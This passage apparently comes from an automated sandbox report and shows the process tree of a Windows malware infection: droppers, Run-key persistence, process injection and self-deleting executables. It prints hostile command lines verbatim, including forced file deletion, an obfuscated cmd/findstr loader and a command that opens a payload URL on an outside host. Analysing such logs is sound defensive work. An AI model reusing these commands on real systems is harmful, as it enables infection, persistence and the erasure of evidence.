                                                      • Suspicious use of WriteProcessMemory
                                                      PID:488
                                                      • C:\Users\Admin\AppData\Local\Temp\is-F9S3F.tmp\setups.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-F9S3F.tmp\setups.tmp" /SL5="$40116,427422,192000,C:\Users\Admin\AppData\Local\Temp\8EHEQK4GL1\setups.exe" ll
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Checks computer location settings
                                                        • Loads dropped DLL
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:3424
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2216
                                                    • C:\Users\Admin\Documents\JZSeNrBW2SHXmrQOsDhEcB9n.exe
                                                      "C:\Users\Admin\Documents\JZSeNrBW2SHXmrQOsDhEcB9n.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:4104
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\79139104910.exe"
                                                        6⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:4804
                                                        • C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\79139104910.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\79139104910.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:4888
                                                          • C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\79139104910.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\79139104910.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:4996
                                                            • C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\79139104910.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\79139104910.exe"
                                                              9⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              PID:4448
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\79139104910.exe"
                                                                10⤵
                                                                  PID:6048
                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                    timeout /T 10 /NOBREAK
                                                                    11⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:2236
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\18346303869.exe" /mix
                                                          6⤵
                                                            PID:5056
                                                            • C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\18346303869.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\18346303869.exe" /mix
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Drops file in Windows directory
                                                              • Checks processor information in registry
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of FindShellTrayWindow
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2484
                                                              • C:\Users\Admin\AppData\Local\Temp\Skinks.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\Skinks.exe"
                                                                8⤵
                                                                  PID:6312
                                                                  • C:\Users\Admin\AppData\Local\Temp\New Feature\vpn.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\New Feature\vpn.exe"
                                                                    9⤵
                                                                      PID:3884
                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                        "C:\Windows\System32\svchost.exe"
                                                                        10⤵
                                                                          PID:4120
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c CmD < Sospettoso.xlsx
                                                                          10⤵
                                                                            PID:4240
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              CmD
                                                                              11⤵
                                                                                PID:6012
                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                  findstr /V /R "^yZVxJnOtboCOwYACmuqprbTxDxRIXwIZDiDmtkKRJgAQVpuqCvmPrrQHuBQfGyicmDlUxwbhvpmOWrnxhQuACSVAsVaDcxlDitdaYjFBYkzUEwLrevwQZGTHHKCmIUSwYVHRMucwlFCd$" Fermare.xlsx
                                                                                  12⤵
                                                                                    PID:11732
                                                                                  • C:\Users\Admin\AppData\Roaming\AdikuzPulW\Dimmi.exe.com
                                                                                    Dimmi.exe.com x
                                                                                    12⤵
                                                                                      PID:11908
                                                                                      • C:\Users\Admin\AppData\Roaming\AdikuzPulW\Dimmi.exe.com
                                                                                        C:\Users\Admin\AppData\Roaming\AdikuzPulW\Dimmi.exe.com x
                                                                                        13⤵
                                                                                          PID:11952
                                                                                          • C:\Users\Admin\AppData\Local\Temp\ljprevijwinj.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\ljprevijwinj.exe"
                                                                                            14⤵
                                                                                              PID:9712
                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\goqthpf.vbs"
                                                                                              14⤵
                                                                                                PID:9744
                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\leyojulc.vbs"
                                                                                                14⤵
                                                                                                  PID:5140
                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                              ping 127.0.0.1 -n 30
                                                                                              12⤵
                                                                                              • Runs ping.exe
                                                                                              PID:12012
                                                                                      • C:\Users\Admin\AppData\Local\Temp\New Feature\6.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\New Feature\6.exe"
                                                                                        9⤵
                                                                                          PID:3244
                                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                                            "C:\Windows\System32\svchost.exe"
                                                                                            10⤵
                                                                                              PID:988
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c CmD < Veduto.aspx
                                                                                              10⤵
                                                                                                PID:3040
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  CmD
                                                                                                  11⤵
                                                                                                    PID:180
                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                      findstr /V /R "^aTBSeprklsEdUBjaIQPOTdrkjIzkdxVxYGzCSmbkAwUsrqIIuWPCefDwPdGzQRVQvlagiKmozDgScLijqKtxFzsIrsMCTrcIutVTIzBvvGonwL$" Ama.aspx
                                                                                                      12⤵
                                                                                                        PID:10804
                                                                                                      • C:\Users\Admin\AppData\Roaming\oSXbHZepFnQhkxxrjgN\Allora.exe.com
                                                                                                        Allora.exe.com S
                                                                                                        12⤵
                                                                                                          PID:4136
                                                                                                          • C:\Users\Admin\AppData\Roaming\oSXbHZepFnQhkxxrjgN\Allora.exe.com
                                                                                                            C:\Users\Admin\AppData\Roaming\oSXbHZepFnQhkxxrjgN\Allora.exe.com S
                                                                                                            13⤵
                                                                                                              PID:11176
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /c rd /s /q C:\ProgramData\mcmhhkstjtgs & timeout 2 & del /f /q "C:\Users\Admin\AppData\Roaming\oSXbHZepFnQhkxxrjgN\Allora.exe.com"
                                                                                                                14⤵
                                                                                                                  PID:10964
                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                    timeout 2
                                                                                                                    15⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:11168
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /c rd /s /q C:\ProgramData\mcmhhkstjtgs & timeout 2 & del /f /q "C:\Users\Admin\AppData\Roaming\oSXbHZepFnQhkxxrjgN\Allora.exe.com"
                                                                                                                  14⤵
                                                                                                                    PID:11132
                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                      timeout 2
                                                                                                                      15⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:10996
                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                ping 127.0.0.1 -n 30
                                                                                                                12⤵
                                                                                                                • Runs ping.exe
                                                                                                                PID:5964
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\New Feature\4.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\New Feature\4.exe"
                                                                                                          9⤵
                                                                                                            PID:1212
                                                                                                            • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                                              10⤵
                                                                                                                PID:4992
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\OMTUbtwmJPo & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{6YtE-enoe1-FTYT-jw66Z}\18346303869.exe"
                                                                                                            8⤵
                                                                                                              PID:7164
                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                timeout 3
                                                                                                                9⤵
                                                                                                                • Drops file in Windows directory
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:6884
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "JZSeNrBW2SHXmrQOsDhEcB9n.exe" /f & erase "C:\Users\Admin\Documents\JZSeNrBW2SHXmrQOsDhEcB9n.exe" & exit
                                                                                                          6⤵
                                                                                                            PID:844
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /im "JZSeNrBW2SHXmrQOsDhEcB9n.exe" /f
                                                                                                              7⤵
                                                                                                              • Kills process with taskkill
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:4460
                                                                                                        • C:\Users\Admin\Documents\xsisRmf9QYcorUoW9aDkaynv.exe
                                                                                                          "C:\Users\Admin\Documents\xsisRmf9QYcorUoW9aDkaynv.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:5628
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5DWAY0Y1XB\multitimer.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\5DWAY0Y1XB\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Drops file in Windows directory
                                                                                                            PID:6096
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5DWAY0Y1XB\multitimer.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\5DWAY0Y1XB\multitimer.exe" 1 3.1616404552.60586048ad874 105
                                                                                                              7⤵
                                                                                                                PID:6304
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5DWAY0Y1XB\multitimer.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\5DWAY0Y1XB\multitimer.exe" 2 3.1616404552.60586048ad874
                                                                                                                  8⤵
                                                                                                                  • Maps connected drives based on registry
                                                                                                                  • Enumerates system info in registry
                                                                                                                  PID:5484
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ZO3RIL7NLB\setups.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\ZO3RIL7NLB\setups.exe" ll
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5932
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-3B7II.tmp\setups.tmp
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-3B7II.tmp\setups.tmp" /SL5="$80434,427422,192000,C:\Users\Admin\AppData\Local\Temp\ZO3RIL7NLB\setups.exe" ll
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                PID:6192
                                                                                                          • C:\Users\Admin\Documents\ao6Cj5ztMuu8mv6NL8w0bG1N.exe
                                                                                                            "C:\Users\Admin\Documents\ao6Cj5ztMuu8mv6NL8w0bG1N.exe"
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:5608
                                                                                                            • C:\Users\Admin\Documents\ao6Cj5ztMuu8mv6NL8w0bG1N.exe
                                                                                                              "C:\Users\Admin\Documents\ao6Cj5ztMuu8mv6NL8w0bG1N.exe"
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:3340
                                                                                                          • C:\Users\Admin\Documents\QRTBeTEpQLFpEn8kg1g9vgl7.exe
                                                                                                            "C:\Users\Admin\Documents\QRTBeTEpQLFpEn8kg1g9vgl7.exe"
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:5688
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\TRGEL85RDB\multitimer.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\TRGEL85RDB\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Drops file in Windows directory
                                                                                                              PID:1020
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\TRGEL85RDB\multitimer.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\TRGEL85RDB\multitimer.exe" 1 3.1616404552.60586048a6d70 105
                                                                                                                7⤵
                                                                                                                  PID:4476
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\TRGEL85RDB\multitimer.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\TRGEL85RDB\multitimer.exe" 2 3.1616404552.60586048a6d70
                                                                                                                    8⤵
                                                                                                                    • Maps connected drives based on registry
                                                                                                                    • Enumerates system info in registry
                                                                                                                    PID:628
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\TWO9O6ZCUU\setups.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\TWO9O6ZCUU\setups.exe" ll
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3128
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-N65NB.tmp\setups.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-N65NB.tmp\setups.tmp" /SL5="$30436,427422,192000,C:\Users\Admin\AppData\Local\Temp\TWO9O6ZCUU\setups.exe" ll
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:5052
                                                                                                            • C:\Users\Admin\Documents\FxfTx8erfPX6fyGtW3PtDbgN.exe
                                                                                                              "C:\Users\Admin\Documents\FxfTx8erfPX6fyGtW3PtDbgN.exe"
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5640
                                                                                                            • C:\Users\Admin\Documents\VbK9YfyeRvt8rDnUGnSrmaN1.exe
                                                                                                              "C:\Users\Admin\Documents\VbK9YfyeRvt8rDnUGnSrmaN1.exe"
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Checks processor information in registry
                                                                                                              PID:4244
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im VbK9YfyeRvt8rDnUGnSrmaN1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\VbK9YfyeRvt8rDnUGnSrmaN1.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                6⤵
                                                                                                                  PID:5328
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /im VbK9YfyeRvt8rDnUGnSrmaN1.exe /f
                                                                                                                    7⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    PID:5652
                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                    timeout /t 6
                                                                                                                    7⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:5584
                                                                                                              • C:\Users\Admin\Documents\OTv1aoIKsmaXSh1jpUZgH0XD.exe
                                                                                                                "C:\Users\Admin\Documents\OTv1aoIKsmaXSh1jpUZgH0XD.exe"
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:408
                                                                                                                • C:\ProgramData\532568.5
                                                                                                                  "C:\ProgramData\532568.5"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:1304
                                                                                                                • C:\ProgramData\218944.2
                                                                                                                  "C:\ProgramData\218944.2"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:6016
                                                                                                                  • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                    "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                    7⤵
                                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                                    PID:5800
                                                                                                              • C:\Users\Admin\Documents\6sUPec57VI5dpryixwk9LfT3.exe
                                                                                                                "C:\Users\Admin\Documents\6sUPec57VI5dpryixwk9LfT3.exe"
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious behavior: LoadsDriver
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:5116
                                                                                                              • C:\Users\Admin\Documents\1dqKDXdM3UJScuo9hogG4Vho.exe
                                                                                                                "C:\Users\Admin\Documents\1dqKDXdM3UJScuo9hogG4Vho.exe"
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:5220
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\S7XTGAML67\setups.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\S7XTGAML67\setups.exe" ll
                                                                                                                  6⤵
                                                                                                                    PID:6932
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-69EL5.tmp\setups.tmp
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-69EL5.tmp\setups.tmp" /SL5="$40526,427422,192000,C:\Users\Admin\AppData\Local\Temp\S7XTGAML67\setups.exe" ll
                                                                                                                      7⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:7048
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\NO92LULRG2\multitimer.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\NO92LULRG2\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
                                                                                                                    6⤵
                                                                                                                      PID:6884
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\NO92LULRG2\multitimer.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\NO92LULRG2\multitimer.exe" 1 3.1616404552.605860487b8d4 105
                                                                                                                        7⤵
                                                                                                                        • Adds Run key to start application
                                                                                                                        PID:200
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\NO92LULRG2\multitimer.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\NO92LULRG2\multitimer.exe" 2 3.1616404552.605860487b8d4
                                                                                                                          8⤵
                                                                                                                          • Maps connected drives based on registry
                                                                                                                          • Enumerates system info in registry
                                                                                                                          PID:6244
                                                                                                                  • C:\Users\Admin\Documents\qeGMdNFSYbt9qljVPOXfGHbY.exe
                                                                                                                    "C:\Users\Admin\Documents\qeGMdNFSYbt9qljVPOXfGHbY.exe"
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Checks processor information in registry
                                                                                                                    PID:2580
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im qeGMdNFSYbt9qljVPOXfGHbY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\qeGMdNFSYbt9qljVPOXfGHbY.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                      6⤵
                                                                                                                        PID:6348
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          taskkill /im qeGMdNFSYbt9qljVPOXfGHbY.exe /f
                                                                                                                          7⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          PID:3784
                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                          timeout /t 6
                                                                                                                          7⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:1424
                                                                                                                    • C:\Users\Admin\Documents\DsdXQewqsY5YG78RFSKRSEOp.exe
                                                                                                                      "C:\Users\Admin\Documents\DsdXQewqsY5YG78RFSKRSEOp.exe"
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:5180
                                                                                                                      • C:\ProgramData\6948904.76
                                                                                                                        "C:\ProgramData\6948904.76"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:6864
                                                                                                                      • C:\ProgramData\7135769.78
                                                                                                                        "C:\ProgramData\7135769.78"
                                                                                                                        6⤵
                                                                                                                          PID:6924
                                                                                                                      • C:\Users\Admin\Documents\dynboTs5K5sKXUxUcUOJZeiw.exe
                                                                                                                        "C:\Users\Admin\Documents\dynboTs5K5sKXUxUcUOJZeiw.exe"
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious behavior: LoadsDriver
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:5216
                                                                                                                      • C:\Users\Admin\Documents\ZgpxDlNt9WSJXcuF3ihBzWpL.exe
                                                                                                                        "C:\Users\Admin\Documents\ZgpxDlNt9WSJXcuF3ihBzWpL.exe"
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4916
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\ZgpxDlNt9WSJXcuF3ihBzWpL.exe"
                                                                                                                          6⤵
                                                                                                                            PID:5200
                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                              timeout /T 10 /NOBREAK
                                                                                                                              7⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:6952
                                                                                                                        • C:\Users\Admin\Documents\Ybpwj9zioycMdvwemGxd9rLc.exe
                                                                                                                          "C:\Users\Admin\Documents\Ybpwj9zioycMdvwemGxd9rLc.exe"
                                                                                                                          5⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5916
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ILE6DHUI4G\multitimer.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\ILE6DHUI4G\multitimer.exe" 0 30603cc16d3187a8.64379538 0 105
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Drops file in Windows directory
                                                                                                                            PID:6848
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ILE6DHUI4G\multitimer.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\ILE6DHUI4G\multitimer.exe" 1 3.1616404552.60586048996f8 105
                                                                                                                              7⤵
                                                                                                                              • Adds Run key to start application
                                                                                                                              PID:6000
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\ILE6DHUI4G\multitimer.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\ILE6DHUI4G\multitimer.exe" 2 3.1616404552.60586048996f8
                                                                                                                                8⤵
                                                                                                                                • Maps connected drives based on registry
                                                                                                                                • Enumerates system info in registry
                                                                                                                                PID:5324
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\N42X9YWCVK\setups.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\N42X9YWCVK\setups.exe" ll
                                                                                                                            6⤵
                                                                                                                              PID:6904
                                                                                                                          • C:\Users\Admin\Documents\QN1ygxdObN4pGb2PLjmBuRxU.exe
                                                                                                                            "C:\Users\Admin\Documents\QN1ygxdObN4pGb2PLjmBuRxU.exe"
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:2132
                                                                                                                            • C:\Users\Admin\Documents\QN1ygxdObN4pGb2PLjmBuRxU.exe
                                                                                                                              "C:\Users\Admin\Documents\QN1ygxdObN4pGb2PLjmBuRxU.exe"
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              PID:5372
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                    1⤵
                                                                                                                    • Drops file in Windows directory
                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                    • Modifies registry class
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:1056
                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                    PID:3952
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                    • Modifies registry class
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:4664
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                    • Modifies registry class
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4816
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                                                                                                    1⤵
                                                                                                                      PID:5416
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-E983N.tmp\{app}\chrome_proxy.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-E983N.tmp\{app}\chrome_proxy.exe"
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:5468
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-LFMOV.tmp\setups.tmp
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-LFMOV.tmp\setups.tmp" /SL5="$40542,427422,192000,C:\Users\Admin\AppData\Local\Temp\N42X9YWCVK\setups.exe" ll
                                                                                                                      1⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:7056
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                      1⤵
                                                                                                                      • Modifies registry class
                                                                                                                      PID:5972
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                      1⤵
                                                                                                                      • Modifies registry class
                                                                                                                      PID:5952
                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                      1⤵
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      PID:6680
